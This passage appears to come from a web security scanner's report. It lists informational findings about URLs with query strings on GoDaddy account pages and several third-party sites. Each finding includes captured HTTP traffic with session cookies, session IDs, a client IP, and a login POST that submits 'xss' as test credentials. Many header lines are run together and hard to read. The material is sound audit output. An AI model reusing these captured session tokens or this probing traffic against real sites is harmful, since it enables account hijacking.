POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script>...[SNIP]... <link href='https://imagesak.securepaynet.net/idp/CSS/sso.css' type="text/css" rel="stylesheet" /> <link href='https://imagesak.securepaynet.net/idp/css/1.css' type="text/css" rel="stylesheet" /> ...[SNIP]... <link href='https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css' type="text/css" rel="stylesheet" /> ...[SNIP]... <link rel="shortcut icon" type="image/x-ico" href="https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico" /> <script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... <script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"> </script>...[SNIP]... <img src='https://imagesak.securepaynet.net/assets/spc_ffffff.gif' border="0" width="1" </td>...[SNIP]... <img src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' border="0" alt="" height="10" width="1"/> </div>...[SNIP]... <img src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' border="0" alt="" height="8" width="1"/> </div>...[SNIP]... <img src='https://imagesak.securepaynet.net/assets/spc_ffffff.gif' border="0" width="1" </td>...[SNIP]... <a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]...
15.25. https://idp.godaddy.com/retrieveaccount.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/retrieveaccount.aspx
Issue detail
The page was loaded from a URL containing a query string:https://idp.godaddy.com/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 https://email.secureserver.net/ https://imagesak.securepaynet.net/idp/CSS/sso.css https://imagesak.securepaynet.net/idp/css/1.css https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico https://imagesak.securepaynet.net/sso/img_password_ret.gif https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1 https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js https://login.secureserver.net/index.php https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe
Request
GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script>...[SNIP]... <link href="https://imagesak.securepaynet.net/idp/CSS/sso.css" type="text/css" rel="stylesheet" /> <link href="https://imagesak.securepaynet.net/idp/css/1.css" type="text/css" rel="stylesheet" /> ...[SNIP]... <link href='https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css' type="text/css" rel="stylesheet" /> ...[SNIP]... <link rel="shortcut icon" type="image/x-ico" href="https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico" /> <script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... <script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"> </script>...[SNIP]... <img src="https://imagesak.securepaynet.net/sso/img_password_ret.gif" height="131" width="132" hspace="8" vspace="8" alt="" /> ...[SNIP]... <a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]...
15.26. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The page was loaded from a URL containing a query string:https://idp.godaddy.com/shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 https://email.secureserver.net/ https://imagesak.securepaynet.net/assets/spc_666666.gif https://imagesak.securepaynet.net/assets/spc_ffffff.gif https://imagesak.securepaynet.net/assets/spc_transparent.gif https://imagesak.securepaynet.net/idp/CSS/sso.css https://imagesak.securepaynet.net/idp/css/1.css https://imagesak.securepaynet.net/mya/indicator.gif https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico https://img1.wsimg.com/mya/myaccount/icon_help_blue.png https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1 https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js https://login.secureserver.net/index.php https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <link href="https://imagesak.securepaynet.net/idp/CSS/sso.css" type="text/css" rel="stylesheet" /> <link href="https://imagesak.securepaynet.net/idp/css/1.css" type="text/css" ...[SNIP]... <script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script>...[SNIP]... <link href='https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css' type="text/css" rel="stylesheet" /> ...[SNIP]... <link rel="shortcut icon" type="image/x-ico" href="https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico" /> <script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... <script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"> </script>...[SNIP]... <img height="5" alt="" src='https://imagesak.securepaynet.net/assets/spc_ffffff.gif' <br />...[SNIP]... <img height="1" alt="" src='https://imagesak.securepaynet.net/assets/spc_666666.gif' ...[SNIP]... <img height="10" alt="" src='https://imagesak.securepaynet.net/assets/spc_ffffff.gif' ...[SNIP]... <img height="1" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img height="3" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img height="8" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img src='https://imagesak.securepaynet.net/mya/indicator.gif' style="position: absolute; ...[SNIP]... <img src="https://img1.wsimg.com//mya/myaccount/icon_help_blue.png" alt="help" onmouseover="atl_hideSelect(true);atl_ShowQuickHelp(event, 'CurrencyPreferences');"_hideSelect(false);atl_HideQuickHelp();" /> ...[SNIP]... <img height="1" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img height="15" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img height="1" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img height="3" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img height="1" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <img height="15" alt="" src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' ...[SNIP]... <a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]...
15.27. http://landing.sendgrid.com/smtp-with-bullet-points/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://landing.sendgrid.com
Path:
/smtp-with-bullet-points/
Issue detail
The page was loaded from a URL containing a query string:http://landing.sendgrid.com/smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ http://cdn.performable.com/catalog/1570.0/assets/images/MgTpS-hootsuite_logo.jpg http://cdn.performable.com/catalog/1570.0/assets/images/UKdcP-foursquare_logo.jpg http://cdn.performable.com/catalog/1570.0/assets/images/daSRY-slideshare_logo.jpg http://cdn.performable.com/catalog/2537.0/assets/images/HBUgk-graph.jpg http://cdn.performable.com/catalog/2537.0/assets/images/iB9K3-check_mark.png http://cdn.performable.com/catalog/2537.0/assets/images/vHBiJ-get_satisfaction_logo.jpg http://d1nu2rn22elx8m.cloudfront.net/catalog/5028.0/assets/images/rMTPr-check_small.png http://d2f7h8c8hc0u7y.cloudfront.net/performable/pax/0a6gTR.js http://munchkin.marketo.net/munchkin.js
Request
GET /smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK6ecdddc8dd049573f00e4".performable.us.performable.com/catalog/2537.0/assets/images/HpeUB-sendgrid_logo.jpg" height="359" width="93" />...[SNIP]... <img style="vertical-align: middle;" src="http://cdn.performable.com/catalog/2537.0/assets/images/iB9K3-check_mark.png" alt="SendGrid Bullet One" width="52" height="45" /> </div>...[SNIP]... <img style="vertical-align: middle;" src="http://cdn.performable.com/catalog/2537.0/assets/images/iB9K3-check_mark.png" alt="SendGrid Bullet Two" width="52" height="45" /> </div>...[SNIP]... <img style="vertical-align: middle;" src="http://d1nu2rn22elx8m.cloudfront.net/catalog/5028.0/assets/images/rMTPr-check_small.png" alt="" width="29" height="25" /> SMTP API<br /> <img style="vertical-align: middle;" src="http://d1nu2rn22elx8m.cloudfront.net/catalog/5028.0/assets/images/rMTPr-check_small.png" alt="" width="29" height="25" /> SMTP relay<br /> <img style="vertical-align: middle;" src="http://d1nu2rn22elx8m.cloudfront.net/catalog/5028.0/assets/images/rMTPr-check_small.png" alt="" width="29" height="25" /> Web API<br /> <img style="vertical-align: middle;" src="http://d1nu2rn22elx8m.cloudfront.net/catalog/5028.0/assets/images/rMTPr-check_small.png" alt="" width="29" height="25" /> Parse API<br /> <img style="vertical-align: middle;" src="http://d1nu2rn22elx8m.cloudfront.net/catalog/5028.0/assets/images/rMTPr-check_small.png" alt="" width="29" height="25" /> Event API</div>...[SNIP]... <img style="vertical-align: middle;" src="http://cdn.performable.com/catalog/2537.0/assets/images/iB9K3-check_mark.png" alt="SendGrid Bullet Three" width="52" height="45" /> </div>...[SNIP]... <img style="vertical-align: middle;" src="http://cdn.performable.com/catalog/2537.0/assets/images/iB9K3-check_mark.png" alt="SendGrid Bullet Four" width="52" height="45" /> </div>...[SNIP]... /pricing.html"><img src="http://cdn.performable.com/catalog/2537.0/assets/images/HBUgk-graph.jpg" width="400" class="main" border="0" /> </a>...[SNIP]... <img src="http://cdn.performable.com/catalog/1570.0/assets/images/UKdcP-foursquare_logo.jpg" /> <img src="http://cdn.performable.com/catalog/1570.0/assets/images/daSRY-slideshare_logo.jpg" /> <img src="http://cdn.performable.com/catalog/2537.0/assets/images/vHBiJ-get_satisfaction_logo.jpg" /> <img src="http://cdn.performable.com/catalog/1570.0/assets/images/MgTpS-hootsuite_logo.jpg" /> ...[SNIP]... <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"> </script>...[SNIP]... <script src="//d2f7h8c8hc0u7y.cloudfront.net/performable/pax/0a6gTR.js"> </script>...[SNIP]...
15.28. http://mediacdn.disqus.com/1316112938/build/system/disqus.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mediacdn.disqus.com
Path:
/1316112938/build/system/disqus.js
Issue detail
The page was loaded from a URL containing a query string:http://mediacdn.disqus.com/1316112938/build/system/disqus.js? http://twitter.com/'+c+' http://www.youtube.com/v/'),
Request
GET /1316112938/build/system/disqus.js? HTTP/1.1/2011/09/godaddy-websites-compromised-with.html;q=0.3822849; __qca=P0-943627109-1315055753168; sessionid=ebeeeac597d2aa02500a0fdc973b4e14; __utma=113869458.1840189074.1315055753.1315760571.1316054545.12; __utmz=113869458.1316054545.12.12.utmcsr=gossipcop.com|utmccn=(referral)|utmcmd=referral|utmcct=/scarlett-johansson-naked-pics-leak-nude-pictures-photos-leaked-scarlet-johanson-johansen-hacked-real-fake/
Response
HTTP/1.1 200 OK,function(){var b=function(){};b.prototype={container:function(){return this._container},textareaContainer:function(){return this._textareaContainer},show:function(){var a=this.con...[SNIP]... "original-title="Expand @'+c+'\'s profile" data-dsq-username="'+c+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+c+'" onclick="window.open(\''+("http://twitter.com/intent/user?screen_name="+c)+"', 'Twitter Mention', 'height=420, width=550');return false;\"> @"+c+"</a>...[SNIP]... <embed src="http://www.youtube.com/v/'),.put('&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"> </embed>...[SNIP]...
15.29. https://my.opera.com/community/signup/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://my.opera.com
Path:
/community/signup/
Issue detail
The page was loaded from a URL containing a query string:https://my.opera.com/community/signup/?s_ref=home https://static.myopera.com/community/css/loginsignup.css https://static.myopera.com/community/graphics/dexter/myopera-big.png https://static.myopera.com/community/js/lib/opera-driver-yui-min.js https://static.myopera.com/community/js/lib/opera-min.js https://static.myopera.com/community/js/lib/yui/build/selector/selector-min.js https://static.myopera.com/community/js/lib/yui/build/yuiloader-dom-event/yuiloader-dom-event-min.js https://static.myopera.com/favicon.ico https://www.google.com/recaptcha/api/challenge?k=6LfnuAYAAAAAAJ_9S1HZ8qxfs145BrjYjzec1yjC https://www.google.com/recaptcha/api/noscript?k=6LfnuAYAAAAAAJ_9S1HZ8qxfs145BrjYjzec1yjC
Request
GET /community/signup/?s_ref=home HTTP/1.1/community//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=218314117.1470107793.1316208001.1316208001.1316208001.1; __utmb=218314117.1.10.1316208001; __utmc=218314117; __utmz=218314117.1316208001.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OKzowMTowMA==-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... <link rel="shortcut icon" href="https://static.myopera.com:443/favicon.ico" type="image/x-icon"> <link rel="stylesheet" href="https://static.myopera.com/community/css/loginsignup.css" type="text/css"> ...[SNIP]... /community/"><img src="https://static.myopera.com/community/graphics/dexter/myopera-big.png" alt="My Opera" width="210" height="60"> </a>...[SNIP]... <script src="https://www.google.com/recaptcha/api/challenge?k=6LfnuAYAAAAAAJ_9S1HZ8qxfs145BrjYjzec1yjC" type="text/javascript"> </script><iframe frameborder="0" height="300" src="https://www.google.com/recaptcha/api/noscript?k=6LfnuAYAAAAAAJ_9S1HZ8qxfs145BrjYjzec1yjC" width="500"> </iframe>...[SNIP]... <script type="text/javascript" src="https://static.myopera.com/community/js/lib/yui/build/yuiloader-dom-event/yuiloader-dom-event-min.js"> </script><script type="text/javascript" src="https://static.myopera.com/community/js/lib/yui/build/selector/selector-min.js"> </script><script type="text/javascript" src="https://static.myopera.com/community/js/lib/opera-min.js"> </script><script type="text/javascript" src="https://static.myopera.com/community/js/lib/opera-driver-yui-min.js"> </script>...[SNIP]...
15.30. https://mya.godaddy.com/Default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/Default.aspx
Issue detail
The page was loaded from a URL containing a query string:https://mya.godaddy.com/Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 https://email.secureserver.net/ https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js https://img1.wsimg.com/assets/godaddy.ico https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1 https://img1.wsimg.com/fos/ani/spinner.gif https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif https://img1.wsimg.com/mya/1/dragon/ani/ani_wait_bar.gif https://img1.wsimg.com/mya/Banners/but_getstarted.png https://img1.wsimg.com/mya/css/1/mya_https_20101203.css https://img1.wsimg.com/mya/indicator.gif https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js https://img1.wsimg.com/mya/scripts/jquery.stylish-select3.min.js https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1 https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js https://login.secureserver.net/index.php https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe
Request
GET /Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d
Response
HTTP/1.1 200 OKbkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/rceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><link rel="Stylesheet" type="text/css" href="https://img1.wsimg.com/mya/css/1/mya_https_20101203.css" /> <title>...[SNIP]... <link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /> </head>...[SNIP]... 'body').html('');"><script src="https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery.stylish-select3.min.js" type="text/javascript"> </script>...[SNIP]... <link href='https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css' type="text/css" rel="stylesheet" /> <script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... .com/affiliates/affiliate-program.aspx?ci=19439&isc=d0d8de1c80"><img alt="Get Started Button" src="https://img1.wsimg.com/mya/Banners/but_getstarted.png" /> </a>...[SNIP]... <img id="AjaxSpinner" alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" style="display:none;"/> ...[SNIP]... -integrated-menu" class="integrated-menu clear-fix" style="display: none;"><img id="auction-progress" src='https://img1.wsimg.com/mya/indicator.gif' ...[SNIP]... <img id="bids-progress" src='https://img1.wsimg.com/mya/indicator.gif' ...[SNIP]... <img src='https://img1.wsimg.com/fos/ani/spinner.gif' alt="Please Wait..." style="margin: 0; padding: 0;" /> ...[SNIP]... <img src='https://img1.wsimg.com/fos/ani/spinner.gif' alt="Please Wait..." style="margin: 0; padding: 0;" /> ...[SNIP]... ;z-index:10000;display:none;"><img src='https://img1.wsimg.com/mya/1/dragon/ani/ani_wait_bar.gif' alt="Please Wait..." style="margin: 0; padding: 0;" /> ...[SNIP]... <a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]...
15.31. https://mya.godaddy.com/myrenewals/myRenewals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/myrenewals/myRenewals.aspx
Issue detail
The page was loaded from a URL containing a query string:https://mya.godaddy.com/myrenewals/myRenewals.aspx?ci=11279&tab=products https://email.secureserver.net/ https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js https://img1.wsimg.com/assets/godaddy.ico https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1 https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif https://img1.wsimg.com/mya/bg/hdr_myr.png https://img1.wsimg.com/mya/css/1/mya_https_20101203.css https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js https://img1.wsimg.com/mya/scripts/jquery.ui.datepicker.min.js https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1 https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js https://login.secureserver.net/index.php https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe
Request
GET /myrenewals/myRenewals.aspx?ci=11279&tab=products HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><link rel="Stylesheet" type="text/css" href="https://img1.wsimg.com/mya/css/1/mya_https_20101203.css" /> ...[SNIP]... <link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /> </head>...[SNIP]... 'body').html('');"><script src="https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery.ui.datepicker.min.js" type="text/javascript"> </script>...[SNIP]... <link href='https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css' type="text/css" rel="stylesheet" /> <script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... <img src="https://img1.wsimg.com/mya/bg/hdr_myr.png" alt="banner" /> ...[SNIP]... <img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" /> ...[SNIP]... <img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" /> ...[SNIP]... <img id="AjaxSpinner" alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" -family:Arial;font-size:12px;display:none;" >...[SNIP]... <a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]...
15.32. http://player.ooyala.com/player.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/player.js
Issue detail
The page was loaded from a URL containing a query string:http://player.ooyala.com/player.js?width=388&height=290&embedCode=BxcnZkMjpvja5pkM5Te_e_rArpHwljfi http://www.adobe.com/go/getflash/
Request
GET /player.js?width=388&height=290&embedCode=BxcnZkMjpvja5pkM5Te_e_rArpHwljfi HTTP/1.1/SEM/AP/free-30-day-trial-20J6-1725H4.html;q=0.3.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... <a href="http://www.adobe.com/go/getflash/" style="color:white"> <span style="font-size:12px">...[SNIP]...
